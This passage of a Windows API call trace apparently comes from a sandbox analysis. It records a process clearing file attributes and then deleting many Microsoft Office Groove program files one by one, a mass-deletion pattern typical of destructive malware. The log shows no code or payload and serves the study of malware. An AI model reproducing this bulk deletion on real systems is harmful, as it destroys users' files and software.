lpBuffer="C:\\Windows\\system32") returned 0x13 [0076.467] CoTaskMemFree (pv=0x506980) [0076.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0076.469] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.477] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\DiscussionToolIconImages.jpg", dwFileAttributes=0x80) returned 1 [0076.477] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\DiscussionToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\discussion\\discussiontooliconimages.jpg")) returned 1 [0076.479] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0076.480] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0076.480] CoTaskMemFree (pv=0x506980) [0076.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0076.481] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.487] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare\\WSSFilesToolHomePageBackground.jpg", dwFileAttributes=0x80) returned 1 [0076.487] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare\\WSSFilesToolHomePageBackground.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\documentshare\\wssfilestoolhomepagebackground.jpg")) returned 1 [0076.489] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0076.489] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0076.489] CoTaskMemFree (pv=0x506980) [0076.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0076.492] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.497] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\ActiveTabImage.jpg", dwFileAttributes=0x80) returned 1 [0076.497] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\ActiveTabImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\activetabimage.jpg")) returned 1 [0076.499] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.504] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\BodyPaneBackground.jpg", dwFileAttributes=0x80) returned 1 [0076.504] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\BodyPaneBackground.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\bodypanebackground.jpg")) returned 1 [0076.508] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.512] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\InactiveTabImage.jpg", dwFileAttributes=0x80) returned 1 [0076.513] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\InactiveTabImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\inactivetabimage.jpg")) returned 1 [0076.516] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.529] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\MarkupIconImages.jpg", dwFileAttributes=0x80) returned 1 [0076.530] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\MarkupIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\markupiconimages.jpg")) returned 1 [0076.532] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0076.532] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0076.532] CoTaskMemFree (pv=0x506980) [0076.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0076.538] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.545] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\AddToViewArrow.jpg", dwFileAttributes=0x80) returned 1 [0076.545] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\AddToViewArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\addtoviewarrow.jpg")) returned 1 [0076.548] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.553] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsBlankPage.html", dwFileAttributes=0x80) returned 1 [0076.553] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsBlankPage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsblankpage.html")) returned 1 [0076.557] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.561] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsBrowserUpgrade.html", dwFileAttributes=0x80) returned 1 [0076.561] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsBrowserUpgrade.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsbrowserupgrade.html")) returned 1 [0076.564] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.568] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsDoNotTrust.html", dwFileAttributes=0x80) returned 1 [0076.569] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsDoNotTrust.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsdonottrust.html")) returned 1 [0076.572] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.576] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePage.html", dwFileAttributes=0x80) returned 1 [0076.576] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formshomepage.html")) returned 1 [0076.579] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.584] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsPreviewTemplate.html", dwFileAttributes=0x80) returned 1 [0076.584] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsPreviewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formspreviewtemplate.html")) returned 1 [0076.587] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.594] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsPrintTemplate.html", dwFileAttributes=0x80) returned 1 [0076.594] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsPrintTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsprinttemplate.html")) returned 1 [0076.597] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.602] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsVersion1Warning.htm", dwFileAttributes=0x80) returned 1 [0076.602] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsVersion1Warning.htm" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsversion1warning.htm")) returned 1 [0076.604] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.609] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsViewAttachmentIcons.jpg", dwFileAttributes=0x80) returned 1 [0076.609] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsViewAttachmentIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsviewattachmenticons.jpg")) returned 1 [0076.612] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.616] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsViewFrame.html", dwFileAttributes=0x80) returned 1 [0076.617] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsViewFrame.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsviewframe.html")) returned 1 [0076.622] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.626] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormToolImages.jpg", dwFileAttributes=0x80) returned 1 [0076.626] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormToolImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formtoolimages.jpg")) returned 1 [0076.629] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.638] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\GrooveFormsMetaData.xml", dwFileAttributes=0x80) returned 1 [0076.639] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\GrooveFormsMetaData.xml" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\grooveformsmetadata.xml")) returned 1 [0076.643] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.647] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\ViewHeaderPreview.jpg", dwFileAttributes=0x80) returned 1 [0076.647] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\ViewHeaderPreview.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\viewheaderpreview.jpg")) returned 1 [0076.650] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0076.650] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0076.650] CoTaskMemFree (pv=0x506980) [0076.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0076.653] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.658] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\Attachments.jpg", dwFileAttributes=0x80) returned 1 [0076.659] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\Attachments.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\attachments.jpg")) returned 1 [0076.661] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.667] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\BREAK.JPG", dwFileAttributes=0x80) returned 1 [0076.667] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\BREAK.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\break.jpg")) returned 1 [0076.670] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.676] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\BUTTON.JPG", dwFileAttributes=0x80) returned 1 [0076.676] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\BUTTON.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\button.jpg")) returned 1 [0076.679] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.684] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\CHECKBOX.JPG", dwFileAttributes=0x80) returned 1 [0076.684] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\CHECKBOX.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\checkbox.jpg")) returned 1 [0076.687] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.693] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\COMBOBOX.JPG", dwFileAttributes=0x80) returned 1 [0076.693] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\COMBOBOX.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\combobox.jpg")) returned 1 [0076.696] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.702] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\CONTACT.JPG", dwFileAttributes=0x80) returned 1 [0076.702] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\CONTACT.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\contact.jpg")) returned 1 [0076.707] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.721] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\CURRENCY.JPG", dwFileAttributes=0x80) returned 1 [0076.721] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\CURRENCY.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\currency.jpg")) returned 1 [0076.724] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.729] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\DATE.JPG", dwFileAttributes=0x80) returned 1 [0076.729] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\DATE.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\date.jpg")) returned 1 [0076.732] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.737] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\DATETIME.JPG", dwFileAttributes=0x80) returned 1 [0076.737] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\DATETIME.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\datetime.jpg")) returned 1 [0076.741] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.746] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\DigitalInk.jpg", dwFileAttributes=0x80) returned 1 [0076.746] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\DigitalInk.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\digitalink.jpg")) returned 1 [0076.750] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.754] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\EmbeddedView.jpg", dwFileAttributes=0x80) returned 1 [0076.754] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\EmbeddedView.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\embeddedview.jpg")) returned 1 [0076.757] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.762] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\HEADING.JPG", dwFileAttributes=0x80) returned 1 [0076.763] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\HEADING.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\heading.jpg")) returned 1 [0076.766] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", 